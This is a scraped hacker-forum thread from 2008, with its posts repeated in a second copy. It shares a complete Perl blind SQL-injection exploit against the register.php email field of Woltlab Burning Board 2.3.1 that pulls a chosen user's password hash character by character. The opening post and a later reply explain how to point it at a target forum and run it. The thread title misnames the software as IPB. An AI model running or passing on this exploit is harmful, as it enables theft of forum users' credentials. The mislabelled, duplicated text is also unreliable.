IPB 2.3.1 register.php SQL-Injection Exploit

The Boss · 05-02-2008

Copy this code and paste it into notepad then save as exploitnamehere.pl

Edit the code to use it
ex.

my $host = 'www.domainoftheforumhere.com';
my $path = '/forums/'; # path to the board /forums/ is most common
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = 'Optional'; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards not needed

<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>#!/usr/bin/perl

use strict;
use IO::Socket::INET;

$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit www.security-project.org
Exploit by deluxe89
----------
";

my $host = 'www.security-project.org';
my $path = '/wbb2/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards

# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
print "[~] Using a proxy\n";
}
else
{
print "[~] You're using NO proxy!\n";
sleep(1);
}

#
# Get the hash
#

print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";

my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";

sub test
{
my ($i, $num, $g) = @_;

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num)/*";
my $data = "r_username=$username&r_email=$value&r_password=aa aaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_ic q=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=& r_gender=0&r_signature=&r_usertext=&field%5B1%5D=& field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecoo kies=1&r_admincanemail=1&r_showemail=1&r_usercanem ail=1&r_emailnotify=0&r_notificationperpm=0&r_rece ivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures =1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_ umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_ti meformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_ usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid= &disclaimer=viewed";

print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";

while(<$sock>)
{
if($_ =~ m/$error/) { return 1; }
}
return 0;
}

# milw0rm.com [2005-05-20]</div>

**Armageddon** · 05-26-2008

thnxxx a lot..

~~Immortal~~ · 05-26-2008

thanks for this i seen other exploits like these can you explain briefly how to use them plz. thanks

The Boss · 05-26-2008

you need to have perl installed on your system... thn open notepad.... copy this code onto it and save as anyname.pl

now put this file in your bin folder of perl directory

run this exploit via command prompt....ie c:/perl/bin/anyname.pl

i hope it helps

~~Immortal~~ · 05-26-2008

Quote:

Originally Posted by The Boss

you need to have perl installed on your system... thn open notepad.... copy this code onto it and save as anyname.pl

now put this file in your bin folder of perl directory

run this exploit via command prompt....ie c:/perl/bin/anyname.pl

i hope it helps

thanks boss im all sorted now.

kwiateusz · 05-31-2008

u say thats for ipb but in exploit it's woltab burning board :] you made a mistake

ThE KinG · 05-31-2008

thanx a lot dude...

The Boss · 05-31-2008

Quote:

Originally Posted by kwiateusz

u say thats for ipb but in exploit it's woltab burning board :] you made a mistake

What do you mean

**RampageX11** · 05-31-2008

but whaty to do after saving it in pl and thanks thnks

~~Immortal~~ · 05-31-2008

RapidShare: 1-Click Webhosting

active perl

05-02-2008	#1 (permalink)
The Boss Founder Join Date: Mar 2006 Posts: 7,413 Thanks: 130 Thanked 232 Times in 139 Posts Rep Power: 285 Awards Showcase Total Awards: 6	Copy this code and paste it into notepad then save as exploitnamehere.pl Edit the code to use it ex. my $host = 'www.domainoftheforumhere.com'; my $path = '/forums/'; # path to the board /forums/ is most common my $userid = 1; # the password hash will be from the user with this id my $username = 'deluxe89'; # any username from the board my $proxy = 'Optional'; # proxy, you can leave this empty my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards not needed <div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>#!/usr/bin/perl use strict; use IO::Socket::INET; $\| = print " Woltlab Burning Board <= 2.3.1 Exploit Vulnerability discovered by GulfTech Security Research Visit www.security-project.org Exploit by deluxe89 ---------- "; my $host = 'www.security-project.org'; my $path = '/wbb2/'; # path to the board my $userid = 1; # the password hash will be from the user with this id my $username = 'deluxe89'; # any username from the board my $proxy = ''; # proxy, you can leave this empty my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards # proxy handling my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80); if($proxy ne '') { print "[~] Using a proxy\n"; } else { print "[~] You're using NO proxy!\n"; sleep(1); } # # Get the hash # print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: "; my $hash = ''; for(my $i=1;$i<33;$i++) { my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server'); if(&test($i, 96)) # buchstabe { for(my $c=97;$c<103;$c++) { if(&test($i, $c, 1)) { print pack('c', $c); last; } } } else # zahl { #print "0-4\n"; for(my $c=48;$c<58;$c++) { if(&test($i, $c, 1)) { print pack('c', $c); last; } } } } print "\n"; sub test { my ($i, $num, $g) = @_; my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server'); my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))"; $value .= ($g) ? '=' : '>'; $value .= "$num)/"; my $data = "r_username=$username&r_email=$value&r_password=aa aaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_ic q=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=& r_gender=0&r_signature=&r_usertext=&field%5B1%5D=& field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecoo kies=1&r_admincanemail=1&r_showemail=1&r_usercanem ail=1&r_emailnotify=0&r_notificationperpm=0&r_rece ivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures =1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_ umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_ti meformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_ usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid= &disclaimer=viewed"; print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n"; while(<$sock>) { if($_ =~ m/$error/) { return 1; } } return 0; } # milw0rm.com [2005-05-20]</div> __________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.*

05-26-2008	#2 (permalink)
Armageddon Studentz Join Date: Jun 2006 Location: On port u forgot to secure! Age: 18 Posts: 6,125 Thanks: 57 Thanked 171 Times in 126 Posts Rep Power: 250 Awards Showcase Total Awards: 6	thnxxx a lot.. __________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

05-31-2008	#9 (permalink)
RampageX11 Badhackerz Join Date: Apr 2008 Location: Detention cell Posts: 628 Thanks: 96 Thanked 60 Times in 25 Posts Rep Power: 59	but whaty to do after saving it in pl and thanks thnks __________________ selling To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
phpBB 2.0.21 (alltopics.php) SQL Injection Exploit	Armageddon	Exploit Codes	0	08-06-2008 12:01 PM
ODFaq 2.1.0 Blind SQL Injection Exploit	Armageddon	Exploit Codes	0	08-04-2008 01:40 PM
HRS Multi Blind SQL Injection Exploit	Armageddon	Exploit Codes	0	08-01-2008 03:04 PM
Remote SQL Injection Exploit	Immortal	Exploit Codes	0	05-28-2008 10:21 PM
phpBB 3 Remote SQL Injection Exploit	KnightRider	Exploit Codes	2	05-24-2008 07:52 AM

05-26-2008	#3 (permalink)
~~Immortal~~ Hackerz Guru Join Date: Feb 2008 Location: GuildFord Age: 18 Posts: 1,973 Thanks: 34 Thanked 161 Times in 99 Posts Rep Power: 0 Awards Showcase Total Awards: 2	thanks for this i seen other exploits like these can you explain briefly how to use them plz. thanks

05-26-2008	#4 (permalink)
The Boss Founder Join Date: Mar 2006 Posts: 7,413 Thanks: 130 Thanked 232 Times in 139 Posts Rep Power: 285 Awards Showcase Total Awards: 6	you need to have perl installed on your system... thn open notepad.... copy this code onto it and save as anyname.pl now put this file in your bin folder of perl directory run this exploit via command prompt....ie c:/perl/bin/anyname.pl i hope it helps

05-31-2008	#6 (permalink)
kwiateusz Junior Member Join Date: May 2008 Posts: 1 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 0	u say thats for ipb but in exploit it's woltab burning board :] you made a mistake

05-31-2008	#7 (permalink)
ThE KinG Experienced Member Join Date: May 2008 Posts: 310 Thanks: 0 Thanked 9 Times in 8 Posts Rep Power: 31	thanx a lot dude...

05-31-2008	#10 (permalink)
~~Immortal~~ Hackerz Guru Join Date: Feb 2008 Location: GuildFord Age: 18 Posts: 1,973 Thanks: 34 Thanked 161 Times in 99 Posts Rep Power: 0 Awards Showcase Total Awards: 2	RapidShare: 1-Click Webhosting active perl

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)